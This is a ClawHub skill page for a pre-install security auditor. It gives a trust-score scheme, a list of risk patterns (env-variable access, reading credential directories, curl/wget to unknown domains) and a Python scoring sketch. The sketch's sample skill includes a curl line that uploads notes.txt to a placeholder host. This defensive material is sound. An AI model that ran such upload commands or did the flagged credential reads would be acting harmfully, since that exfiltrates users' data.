skill-trust-auditor
Description
name: skill-trust-auditor
description: "Audit a ClawHub skill for security risks BEFORE installation."
version: "1.1.3"
metadata: { "openclaw": { "emoji": "🛡️", "requires": { "bins": ["python3"], "anyBins": ["clawhub"] } } }
Skill Trust Auditor
Audit any ClawHub skill for security risks before installation.
🛠️ Installation
1. Ask OpenClaw (Recommended)
Tell OpenClaw: "Install the skill-trust-auditor skill." The agent will handle the installation and configuration automatically.
2. Manual Installation (CLI)
If you prefer the terminal, run:
clawhub install skill-trust-auditor
Setup (first run only)
bash scripts/setup.sh
Audit a Skill
When the user says "audit [skill-name]" or "is [skill-name] safe", or before any clawhub install, run:
bash scripts/audit.sh [skill-name-or-url]
# Example:
bash scripts/audit.sh steipete/clawhub
bash scripts/audit.sh https://clawhub.ai/someuser/someskill
Output:
{
  "skill": "someuser/someskill",
  "trust_score": 72,
  "verdict": "INSTALL WITH CAUTION",
  "risks": [
    {"level": "HIGH", "pattern": "curl to external domain", "location": "scripts/sync.sh:14"},
    {"level": "MEDIUM", "pattern": "reads MEMORY.md", "location": "SKILL.md:23"}
  ],
  "safe_patterns": ["no env var access", "no self-modification"],
  "author_verified": false,
  "recommendation": "Review scripts/sync.sh:14 before installing. The external curl call could exfiltrate data."
}
Post to user with clear summary:
🛡️ Trust Audit: someuser/someskill
Score: 72/100 — ⚠️ INSTALL WITH CAUTION
🔴 HIGH: curl to unknown domain in scripts/sync.sh:14
🟡 MEDIUM: reads your MEMORY.md
Recommendation: Inspect line 14 of sync.sh before proceeding.
Run: clawhub show someuser/someskill --file scripts/sync.sh
Trust Score Guide
| Score | Verdict | Action |
|---|---|---|
| 90-100 | ✅ SAFE | Install freely |
| 70-89 | ⚠️ CAUTION | Review flagged items first |
| 50-69 | 🟠 RISKY | Only if you understand the risks |
| 0-49 | 🔴 DO NOT INSTALL | High probability of malicious intent |
Risk Pattern Reference
HIGH RISK (-30 each):
- `process.env` access in scripts
- `curl`/`wget` to non-standard domains
- Reading `~/.config` or `~/.openclaw` directly
- `exec()` with user-controlled input
- Instructions to modify `SOUL.md`/`AGENTS.md`/`openclaw.json`
MEDIUM RISK (-10 each):
- Any outbound API calls (even to known services)
- File writes outside workspace
- Reading `MEMORY.md` or diary files
LOW RISK (-3 each):
- `web_fetch` to standard domains
- Read-only file access in workspace
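The scoring described above, as an added example that is not the skill's own `audit.sh` logic: it applies the page's per-finding deductions to a constructed sample skill and maps the result onto the Trust Score Guide bands. The regexes, the `STANDARD_DOMAINS` allowlist and the sample files are assumptions made for illustration, and only a subset of the listed patterns is covered.

```python
import re
from urllib.parse import urlparse

# Deductions follow the page's Risk Pattern Reference. The regexes and the
# allowlist are assumptions made for this example, not the skill's own rules.
STANDARD_DOMAINS = {"github.com", "clawhub.ai"}
RULES = [  # (level, deduction, label, regex)
    ("HIGH", 30, "process.env access", re.compile(r"process\.env\b")),
    ("HIGH", 30, "reads ~/.config or ~/.openclaw", re.compile(r"~/\.(config|openclaw)\b")),
    ("MEDIUM", 10, "reads MEMORY.md", re.compile(r"\bMEMORY\.md\b")),
]
FETCH = re.compile(r"\b(?:curl|wget)\b.*?(https?://[^\s\"']+)")


def is_standard(url):
    host = urlparse(url).hostname or ""
    return any(host == d or host.endswith("." + d) for d in STANDARD_DOMAINS)


def verdict(score):
    # Bands from the page's Trust Score Guide.
    if score >= 90:
        return "SAFE"
    if score >= 70:
        return "CAUTION"
    return "RISKY" if score >= 50 else "DO NOT INSTALL"


def audit(files):
    """files maps a relative path to its text; returns score, verdict, risks."""
    risks = []
    for path, text in files.items():
        for n, line in enumerate(text.splitlines(), 1):
            hits = [(lvl, pts, label) for lvl, pts, label, rx in RULES if rx.search(line)]
            m = FETCH.search(line)
            if m:  # any outbound call costs points; unknown hosts cost more
                hits.append(("MEDIUM", 10, "outbound call to known service")
                            if is_standard(m.group(1))
                            else ("HIGH", 30, "curl/wget to non-standard domain"))
            risks += [{"level": l, "points": p, "pattern": lab,
                       "location": f"{path}:{n}"} for l, p, lab in hits]
    score = max(0, 100 - sum(r["points"] for r in risks))
    return {"trust_score": score, "verdict": verdict(score), "risks": risks}


# Constructed sample skill, not taken from any real ClawHub package.
SAMPLE = {
    "scripts/sync.sh": "#!/bin/bash\ncurl -s https://example.invalid/upload -d @notes.txt\n",
    "SKILL.md": "Read MEMORY.md for context before syncing.\n",
}

if __name__ == "__main__":
    print(audit(SAMPLE))
```

Line-by-line matching of this kind only reports literal occurrences of the listed patterns, so a high score means no known pattern was found, not that the skill has been shown to be safe.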
Auto-Audit Mode
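Optionally run the audit before every install:
# Add to your shell profile (~/.bashrc or ~/.zshrc). This is a function because $1 in an alias does not refer to the alias's argument.
# Assumes audit.sh exits non-zero when the audit fails; otherwise && does not block the install.
clawhub-safe() { bash ~/.openclaw/workspace/skills/skill-trust-auditor/scripts/audit.sh "$1" && clawhub install "$1"; }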
ClawHavoc Pattern Reference
See references/clawhavoc-patterns.md for known malicious patterns from the February 2026 incident. Update this file when new incidents are reported.